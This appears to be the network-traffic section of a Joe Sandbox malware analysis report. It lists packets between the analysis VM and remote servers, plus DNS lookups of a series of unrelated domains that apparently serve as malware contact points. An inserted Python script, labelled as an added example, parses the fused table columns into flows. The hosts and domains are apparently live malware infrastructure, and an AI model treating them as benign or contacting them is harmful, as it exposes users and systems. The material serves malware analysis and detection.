Jul 13, 2024 00:05:28.717665911 CEST | 80 | 49768 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:28.717911005 CEST | 49768 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:28.719793081 CEST | 49768 | 80 | 192.168.2.6 | 3.33.130.190
Jul 13, 2024 00:05:28.724914074 CEST | 80 | 49768 | 3.33.130.190 | 192.168.2.6
Jul 13, 2024 00:05:33.772521973 CEST | 49769 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:33.778633118 CEST | 80 | 49769 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:33.782044888 CEST | 49769 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:33.782044888 CEST | 49769 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:33.788681984 CEST | 80 | 49769 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:34.592546940 CEST | 80 | 49769 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:34.642036915 CEST | 80 | 49769 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:34.644329071 CEST | 49769 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:35.285388947 CEST | 49769 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:36.302817106 CEST | 49770 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:36.309803963 CEST | 80 | 49770 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:36.310033083 CEST | 49770 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:36.312694073 CEST | 49770 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:36.319719076 CEST | 80 | 49770 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:37.102924109 CEST | 80 | 49770 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:37.144515038 CEST | 49770 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:37.164050102 CEST | 80 | 49770 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:37.164165974 CEST | 49770 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:37.816427946 CEST | 49770 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:38.835009098 CEST | 49771 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:38.842077971 CEST | 80 | 49771 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:38.842156887 CEST | 49771 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:38.844029903 CEST | 49771 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:38.851224899 CEST | 80 | 49771 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:38.853665113 CEST | 80 | 49771 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:39.668555975 CEST | 80 | 49771 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:39.724476099 CEST | 49771 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:39.918134928 CEST | 80 | 49771 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:39.918258905 CEST | 80 | 49771 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:39.918766975 CEST | 49771 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:40.348532915 CEST | 49771 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:41.365673065 CEST | 49772 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:41.370794058 CEST | 80 | 49772 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:41.370862007 CEST | 49772 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:41.372349024 CEST | 49772 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:41.377191067 CEST | 80 | 49772 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:42.187021017 CEST | 80 | 49772 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:42.236521006 CEST | 80 | 49772 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:42.240521908 CEST | 49772 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:42.241252899 CEST | 49772 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:42.241252899 CEST | 49772 | 80 | 192.168.2.6 | 103.176.91.154
Jul 13, 2024 00:05:42.246167898 CEST | 80 | 49772 | 103.176.91.154 | 192.168.2.6
Jul 13, 2024 00:05:47.277614117 CEST | 49773 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:47.284784079 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:47.284849882 CEST | 49773 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:47.286871910 CEST | 49773 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:47.293803930 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.250333071 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.250382900 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.250459909 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.250464916 CEST | 49773 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:48.250498056 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.250535965 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.250567913 CEST | 49773 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:48.250570059 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.250606060 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.250638962 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.250674009 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.250705957 CEST | 49773 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:48.250711918 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.250746965 CEST | 49773 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:48.251383066 CEST | 49773 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:48.257841110 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.257875919 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.257910967 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.257949114 CEST | 49773 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:48.302165031 CEST | 49773 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:48.342693090 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.342765093 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.342803001 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.342839956 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.342982054 CEST | 49773 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:48.349230051 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.349267960 CEST | 80 | 49773 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:48.349410057 CEST | 49773 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:48.800821066 CEST | 49773 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:49.818525076 CEST | 49774 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:49.825373888 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:49.826253891 CEST | 49774 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:49.830147028 CEST | 49774 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:49.837090969 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.813339949 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.813388109 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.813424110 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.813440084 CEST | 49774 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:50.813457966 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.813544989 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.813553095 CEST | 49774 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:50.813580036 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.813613892 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.813647032 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.813674927 CEST | 49774 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:50.813680887 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.813718081 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.813756943 CEST | 49774 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:50.813756943 CEST | 49774 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:50.820806980 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.820841074 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.820874929 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.820882082 CEST | 49774 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:50.863257885 CEST | 49774 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:50.891833067 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.905704975 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.905742884 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.905750036 CEST | 49774 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:50.905780077 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.905816078 CEST | 49774 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:50.906092882 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.906126976 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.906172037 CEST | 49774 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:50.907993078 CEST | 80 | 49774 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:50.908090115 CEST | 49774 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:51.332195997 CEST | 49774 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:52.351037979 CEST | 49775 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:52.369877100 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:52.375850916 CEST | 49775 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:52.375850916 CEST | 49775 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:52.385540009 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:52.385570049 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.324980021 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.325074911 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.325110912 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.325124025 CEST | 49775 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:53.325144053 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.325180054 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.325186014 CEST | 49775 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:53.325212955 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.325300932 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.325306892 CEST | 49775 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:53.325334072 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.325366974 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.325377941 CEST | 49775 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:53.325402975 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.325443983 CEST | 49775 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:53.332982063 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.333126068 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.333169937 CEST | 49775 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:53.333518028 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.333998919 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.334086895 CEST | 49775 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:53.403384924 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.413047075 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.413103104 CEST | 49775 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:53.413105011 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.413139105 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.413198948 CEST | 49775 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:53.413336039 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.413371086 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.413404942 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.413407087 CEST | 49775 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:53.413791895 CEST | 80 | 49775 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:53.413834095 CEST | 49775 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:53.880513906 CEST | 49775 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:54.898659945 CEST | 49776 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:54.905571938 CEST | 80 | 49776 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:54.905663967 CEST | 49776 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:54.908226013 CEST | 49776 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:54.915414095 CEST | 80 | 49776 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:55.732801914 CEST | 80 | 49776 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:55.732817888 CEST | 80 | 49776 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:05:55.736397982 CEST | 49776 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:55.741532087 CEST | 49776 | 80 | 192.168.2.6 | 5.78.41.174
Jul 13, 2024 00:05:55.748545885 CEST | 80 | 49776 | 5.78.41.174 | 192.168.2.6
Jul 13, 2024 00:06:01.354166031 CEST | 49777 | 80 | 192.168.2.6 | 64.46.102.70
Jul 13, 2024 00:06:01.359042883 CEST | 80 | 49777 | 64.46.102.70 | 192.168.2.6
Jul 13, 2024 00:06:01.360569000 CEST | 49777 | 80 | 192.168.2.6 | 64.46.102.70
Jul 13, 2024 00:06:01.362500906 CEST | 49777 | 80 | 192.168.2.6 | 64.46.102.70
Jul 13, 2024 00:06:01.367597103 CEST | 80 | 49777 | 64.46.102.70 | 192.168.2.6
Jul 13, 2024 00:06:01.812640905 CEST | 80 | 49777 | 64.46.102.70 | 192.168.2.6
Jul 13, 2024 00:06:01.812669992 CEST | 80 | 49777 | 64.46.102.70 | 192.168.2.6
Jul 13, 2024 00:06:01.812742949 CEST | 49777 | 80 | 192.168.2.6 | 64.46.102.70
Jul 13, 2024 00:06:03.425949097 CEST | 49777 | 80 | 192.168.2.6 | 64.46.102.70
Jul 13, 2024 00:06:04.443852901 CEST | 49778 | 80 | 192.168.2.6 | 64.46.102.70
Jul 13, 2024 00:06:04.450422049 CEST | 80 | 49778 | 64.46.102.70 | 192.168.2.6
Jul 13, 2024 00:06:04.450506926 CEST | 49778 | 80 | 192.168.2.6 | 64.46.102.70
Jul 13, 2024 00:06:04.452641964 CEST | 49778 | 80 | 192.168.2.6 | 64.46.102.70
Jul 13, 2024 00:06:04.458736897 CEST | 80 | 49778 | 64.46.102.70 | 192.168.2.6
Jul 13, 2024 00:06:04.908385992 CEST | 80 | 49778 | 64.46.102.70 | 192.168.2.6
Jul 13, 2024 00:06:04.908508062 CEST | 80 | 49778 | 64.46.102.70 | 192.168.2.6
Jul 13, 2024 00:06:04.908571959 CEST | 49778 | 80 | 192.168.2.6 | 64.46.102.70
Jul 13, 2024 00:06:05.957083941 CEST | 49778 | 80 | 192.168.2.6 | 64.46.102.70
Jul 13, 2024 00:06:06.975081921 CEST | 49779 | 80 | 192.168.2.6 | 64.46.102.70
Jul 13, 2024 00:06:06.981921911 CEST | 80 | 49779 | 64.46.102.70 | 192.168.2.6
Jul 13, 2024 00:06:06.982150078 CEST | 49779 | 80 | 192.168.2.6 | 64.46.102.70
Jul 13, 2024 00:06:06.983510017 CEST | 49779 | 80 | 192.168.2.6 | 64.46.102.70
Jul 13, 2024 00:06:06.990243912 CEST | 80 | 49779 | 64.46.102.70 | 192.168.2.6
Jul 13, 2024 00:06:06.991782904 CEST | 80 | 49779 | 64.46.102.70 | 192.168.2.6
Jul 13, 2024 00:06:07.433316946 CEST | 80 | 49779 | 64.46.102.70 | 192.168.2.6
Jul 13, 2024 00:06:07.433346987 CEST | 80 | 49779 | 64.46.102.70 | 192.168.2.6
Jul 13, 2024 00:06:07.434206963 CEST | 49779 | 80 | 192.168.2.6 | 64.46.102.70
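In the extracted report the Source Port, Dest Port, Source IP and Dest IP columns of every packet row are run together into one digit-and-dot string, and that string usually has more than one legal reading (for "4976080192.168.2.63.33.130.190", 497 / 6080 / 192.168.2.6 / 3.33.130.190 is as well-formed as 49760 / 80 / 192.168.2.6 / 3.33.130.190). The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it enumerates every legal split of a row, keeps the reading whose reverse flow is itself a legal reading of another row in the table, and then counts sessions per remote endpoint, which is what an analyst needs to turn this table into a list of contacted servers. It assumes the analysis VM is 192.168.2.6 (the address that appears in every row) and embeds ten rows copied from this table as its constructed sample input.

```python
"""Recover the fused packet table of a Joe Sandbox report into flows.

Added example, not report code.  Each row's port/IP columns arrive as one run
such as "4976080192.168.2.63.33.130.190"; every legal split is enumerated and
the reading whose reverse flow is a legal reading of another row is kept.
"""
import re
from collections import defaultdict
from typing import NamedTuple

SANDBOX_IP = "192.168.2.6"  # assumption: the analysis VM, present in every row

# Constructed sample: ten rows copied from the report (TCP to three servers, one DNS pair).
SAMPLE_ROWS = """\
Jul 13, 2024 00:05:06.017540932 CEST80497603.33.130.190192.168.2.6
Jul 13, 2024 00:05:06.023060083 CEST4976080192.168.2.63.33.130.190
Jul 13, 2024 00:05:08.553622007 CEST4976180192.168.2.63.33.130.190
Jul 13, 2024 00:05:08.559952974 CEST80497613.33.130.190192.168.2.6
Jul 13, 2024 00:05:33.772521973 CEST4976980192.168.2.6103.176.91.154
Jul 13, 2024 00:05:33.778633118 CEST8049769103.176.91.154192.168.2.6
Jul 13, 2024 00:06:01.354166031 CEST4977780192.168.2.664.46.102.70
Jul 13, 2024 00:06:01.359042883 CEST804977764.46.102.70192.168.2.6
Jul 13, 2024 00:02:48.702471972 CEST5757853192.168.2.61.1.1.1
Jul 13, 2024 00:02:48.716965914 CEST53575781.1.1.1192.168.2.6
""".splitlines()

ROW_RE = re.compile(
    r"^([A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ [A-Z]{3,4})([\d.]+)$")


class Flow(NamedTuple):
    sport: int
    dport: int
    src: str
    dst: str

    def reverse(self) -> "Flow":
        return Flow(self.dport, self.sport, self.dst, self.src)


def _port_ok(s: str) -> bool:
    return s.isdigit() and not s.startswith("0") and int(s) <= 65535


def _ip_ok(s: str) -> bool:
    octets = s.split(".")
    return len(octets) == 4 and all(
        o.isdigit() and (o == "0" or not o.startswith("0")) and int(o) <= 255
        for o in octets)


def candidate_flows(fused: str, host_ip: str = SANDBOX_IP) -> list:
    """Every legal (sport, dport, src, dst) reading of one fused column run
    in which the analysis host is one of the two addresses."""
    found = []
    for i in range(1, 6):                      # source port: 1-5 digits
        for j in range(i + 1, i + 6):          # dest port: 1-5 digits
            sp, dp, rest = fused[:i], fused[i:j], fused[j:]
            if not (_port_ok(sp) and _port_ok(dp)):
                continue
            for k in range(7, len(rest) - 6):  # shortest IPv4 text is 7 chars
                ip1, ip2 = rest[:k], rest[k:]
                if _ip_ok(ip1) and _ip_ok(ip2) and host_ip in (ip1, ip2):
                    found.append(Flow(int(sp), int(dp), ip1, ip2))
    return found


def parse_packets(rows, host_ip: str = SANDBOX_IP):
    """Return (packets, unresolved).  A reading survives only when its reverse
    flow is a legal reading of some other row; a row left with zero or several
    survivors (e.g. an orphan without its reply) is reported, not guessed."""
    parsed = []
    for row in rows:
        m = ROW_RE.match(row.strip())
        if not m:
            raise ValueError(f"unexpected row layout: {row!r}")
        parsed.append((m.group(1), candidate_flows(m.group(2), host_ip)))
    seen = {f for _, cands in parsed for f in cands}
    packets, unresolved = [], []
    for ts, cands in parsed:
        survivors = [f for f in cands if f.reverse() in seen]
        if len(survivors) == 1:
            packets.append((ts, survivors[0]))
        else:
            unresolved.append((ts, cands))
    return packets, unresolved


def sessions_by_server(packets, host_ip: str = SANDBOX_IP) -> dict:
    """Distinct host-side ports per remote (ip, port): each ephemeral port is
    one TCP connection or one DNS exchange."""
    ports = defaultdict(set)
    for _, f in packets:
        if f.src == host_ip:
            ports[(f.dst, f.dport)].add(f.sport)
        else:
            ports[(f.src, f.sport)].add(f.dport)
    return {server: len(p) for server, p in ports.items()}


if __name__ == "__main__":
    pkts, bad = parse_packets(SAMPLE_ROWS)
    for ts, f in pkts:
        print(f"{ts}  {f.src}:{f.sport} -> {f.dst}:{f.dport}")
    print(f"{len(bad)} row(s) unresolved")
    for (ip, port), n in sorted(sessions_by_server(pkts).items()):
        print(f"{ip}:{port}  {n} session(s)")
```

Feeding it the whole table instead of the sample gives the per-server session count directly from the report text; the reverse-flow rule works because every connection here has traffic in both directions, and a row whose partner is missing is left in the unresolved list rather than silently assigned the first plausible split.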
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jul 13, 2024 00:02:48.702471972 CEST5757853192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:02:48.716965914 CEST53575781.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:03:04.241286993 CEST5062953192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:03:05.238507032 CEST5062953192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:03:05.778172016 CEST53506291.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:03:05.778317928 CEST53506291.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:03:19.209872961 CEST5455653192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:03:19.283248901 CEST53545561.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:03:32.711782932 CEST6341453192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:03:32.917728901 CEST53634141.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:03:46.164258003 CEST5728153192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:03:46.177983046 CEST53572811.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:03:59.273391008 CEST6522453192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:03:59.287723064 CEST53652241.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:04:12.366466045 CEST5305153192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:04:12.436220884 CEST53530511.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:04:25.694673061 CEST5054853192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:04:25.712505102 CEST53505481.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:04:38.835958004 CEST6161553192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:04:38.856600046 CEST53616151.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:04:51.960598946 CEST4919953192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:04:52.304666042 CEST53491991.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:05:05.788537025 CEST6096753192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:05:06.007956982 CEST53609671.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:05:19.868275881 CEST5062653192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:05:20.554398060 CEST53506261.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:05:33.728169918 CEST6321353192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:05:33.764424086 CEST53632131.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:05:47.256772041 CEST6008853192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:05:47.275691986 CEST53600881.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:06:00.757019043 CEST5136653192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:06:01.351702929 CEST53513661.1.1.1192.168.2.6
                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                          Jul 13, 2024 00:02:48.702471972 CEST | 192.168.2.6 | 1.1.1.1 | 0x523b | Standard query (0) | www.yexz60.live | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:04.241286993 CEST | 192.168.2.6 | 1.1.1.1 | 0x6c77 | Standard query (0) | www.sodnavisystem.com | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:05.238507032 CEST | 192.168.2.6 | 1.1.1.1 | 0x6c77 | Standard query (0) | www.sodnavisystem.com | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:19.209872961 CEST | 192.168.2.6 | 1.1.1.1 | 0x94d7 | Standard query (0) | www.gymroom.online | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:32.711782932 CEST | 192.168.2.6 | 1.1.1.1 | 0x61e4 | Standard query (0) | www.hectmalt.xyz | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:46.164258003 CEST | 192.168.2.6 | 1.1.1.1 | 0x3ddd | Standard query (0) | www.atlpicsstudios.com | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:03:59.273391008 CEST | 192.168.2.6 | 1.1.1.1 | 0x4e37 | Standard query (0) | www.bearclaw.bot | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:04:12.366466045 CEST | 192.168.2.6 | 1.1.1.1 | 0xedea | Standard query (0) | www.noghteyab.com | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:04:25.694673061 CEST | 192.168.2.6 | 1.1.1.1 | 0x2d41 | Standard query (0) | www.mcpcrecycling.com | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:04:38.835958004 CEST | 192.168.2.6 | 1.1.1.1 | 0xc6a5 | Standard query (0) | www.evoolihubs.shop | A (IP address) | IN (0x0001) | false
                                                          Jul 13, 2024 00:04:51.960598946 CEST | 192.168.2.6 | 1.1.1.1 | 0x986e | Standard query (0) | www.shaf-kupe-msk.store | A (IP address) | IN (0x0001) | false
